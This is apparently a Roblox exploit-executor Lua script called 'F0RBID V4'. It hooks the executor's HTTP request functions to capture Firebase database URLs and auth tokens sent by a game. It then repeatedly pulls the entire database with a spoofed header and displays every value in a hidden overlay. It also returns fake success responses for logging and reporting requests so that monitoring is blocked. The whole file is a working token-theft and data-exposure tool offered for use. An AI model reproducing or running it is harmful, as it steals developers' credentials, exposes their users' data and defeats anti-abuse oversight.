-- ========================================================== --
-- 💀 F0RBID V4: FINAL STEALTH & TOTAL EXPOSE
-- ========================================================== --
print("[SYSTEM] 🛰️ F0RBID Protocol V4: Stealth Engaged.")

local HttpService = game:GetService("HttpService")
local CoreGui = game:GetService("CoreGui")
local processedData = {}

local TARGET_URL = nil
local TARGET_AUTH = nil

-- ========================================== --
-- 1. F0RBID PREMIUM UI (DARK & RED)
-- ========================================== --
local uiParent = (gethui and gethui()) or CoreGui
if uiParent:FindFirstChild("F0rbidOmni") then uiParent.F0rbidOmni:Destroy() end

local ScreenGui = Instance.new("ScreenGui")
ScreenGui.Name = "F0rbidOmni"
ScreenGui.Parent = uiParent

local Main = Instance.new("Frame")
Main.Size = UDim2.new(0, 550, 0, 450)
Main.Position = UDim2.new(0.5, -275, 0.5, -225)
Main.BackgroundColor3 = Color3.fromRGB(8, 8, 10)
Main.BorderSizePixel = 0
Main.Active = true
Main.Draggable = true
Main.Parent = ScreenGui

local Corner = Instance.new("UICorner")
Corner.CornerRadius = UDim.new(0, 10)
Corner.Parent = Main

local Accent = Instance.new("Frame")
Accent.Size = UDim2.new(1, 0, 0, 2)
Accent.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
Accent.BorderSizePixel = 0
Accent.Parent = Main

local Title = Instance.new("TextLabel")
Title.Size = UDim2.new(1, -20, 0, 45)
Title.Position = UDim2.new(0, 15, 0, 5)
Title.BackgroundTransparency = 1
Title.Text = "F0RBID <font color='#FF0000'>[FINAL STEALTH]</font>"
Title.RichText = true
Title.TextColor3 = Color3.fromRGB(255, 255, 255)
Title.Font = Enum.Font.GothamBold
Title.TextSize = 18
Title.TextXAlignment = Enum.TextXAlignment.Left
Title.Parent = Main

local Status = Instance.new("TextLabel")
Status.Size = UDim2.new(1, -30, 0, 20)
Status.Position = UDim2.new(0, 15, 0, 40)
Status.BackgroundTransparency = 1
Status.Text = "● STATUS: GHOST MODE ACTIVE"
Status.TextColor3 = Color3.fromRGB(200, 200, 200)
Status.Font = Enum.Font.Code
Status.TextSize = 11
Status.TextXAlignment = Enum.TextXAlignment.Left
Status.Parent = Main

local Scroll = Instance.new("ScrollingFrame")
Scroll.Size = UDim2.new(1, -20, 1, -110)
Scroll.Position = UDim2.new(0, 10, 0, 80)
Scroll.BackgroundTransparency = 1
Scroll.ScrollBarThickness = 2
Scroll.ScrollBarImageColor3 = Color3.fromRGB(255, 0, 0)
Scroll.Parent = Main

local UIList = Instance.new("UIListLayout")
UIList.SortOrder = Enum.SortOrder.LayoutOrder
UIList.Padding = UDim.new(0, 4)
UIList.Parent = Scroll

local function AddLog(path, val)
    local txt = Instance.new("TextLabel")
    txt.Size = UDim2.new(1, 0, 0, 0)
    txt.BackgroundTransparency = 1
    txt.RichText = true
    txt.Text = string.format("<font color='#FF4444'>[%s]</font> %s", path, tostring(val))
    txt.TextColor3 = Color3.fromRGB(230, 230, 230)
    txt.Font = Enum.Font.Code
    txt.TextSize = 12
    txt.TextWrapped = true
    txt.TextXAlignment = Enum.TextXAlignment.Left
    txt.Parent = Scroll
    
    txt.Size = UDim2.new(1, 0, 0, txt.TextBounds.Y + 2)
    Scroll.CanvasSize = UDim2.new(0, 0, 0, UIList.AbsoluteContentSize.Y)
    Scroll.CanvasPosition = Vector2.new(0, 99999)
end

-- ========================================== --
-- 2. FORCEFUL BRUTE-FORCE READER
-- ========================================== --
local function ForceRead(data, path)
    if type(data) ~= "table" then return end
    for k, v in pairs(data) do
        local currentPath = path .. "/" .. tostring(k)
        if type(v) == "table" then
            ForceRead(v, currentPath)
        else
            local rawValue = tostring(v)
            if #rawValue > 0 and not rawValue:find("firebase") then
                local dataId = currentPath .. rawValue
                if not processedData[dataId] then
                    processedData[dataId] = true
                    AddLog(tostring(k), rawValue)
                end
            end
        end
    end
end

local function StartExpose()
    task.spawn(function()
        while task.wait(1.5) do
            if TARGET_URL and TARGET_AUTH then
                pcall(function()
                    local res = request({
                        Url = TARGET_URL .. "/.json?auth=" .. TARGET_AUTH,
                        Method = "GET",
                        Headers = {
                            ["User-Agent"] = "F0RBID-OMNI/4.0",
                            ["X-Forwarded-For"] = "127.0.0.1"
                        }
                    })
                    if res.Success then
                        local decoded = HttpService:JSONDecode(res.Body)
                        if decoded then ForceRead(decoded, "Root") end
                    end
                end)
            end
        end
    end)
end

-- ========================================== --
-- 3. ANTI-TRACKING SNIFFER (FIXED SYNTAX)
-- ========================================== --
local function HookNetwork(req_func)
    local old; old = hookfunction(req_func, function(args)
        -- Detect Target
        if args.Url:find("firebaseio.com") and args.Url:find("auth=") then
            local u = args.Url:match("(https://[%w%-]+%.firebaseio%.com)")
            local a = args.Url:match("auth=([%w%.%-_]+)")
            if u and a and not TARGET_URL then
                TARGET_URL = u
                TARGET_AUTH = a
                Status.Text = "● STATUS: 🔴 F0RBID BYPASS ACTIVE"
                Status.TextColor3 = Color3.fromRGB(255, 0, 0)
                StartExpose()
            end
        end
        -- Block Tracking
        if args.Url:find("log") or args.Url:find("spy") or args.Url:find("report") then
            return {Success = true, StatusCode = 200, Body = "{}"}
        end
        return old(args)
    end)
end

-- Apply Hooks
if request then HookNetwork(request) end
if syn and syn.request then HookNetwork(syn.request) end
if http and http.request then HookNetwork(http.request) end

print("✅ F0RBID V4 Final Loaded. No bugs, purely stealth.")
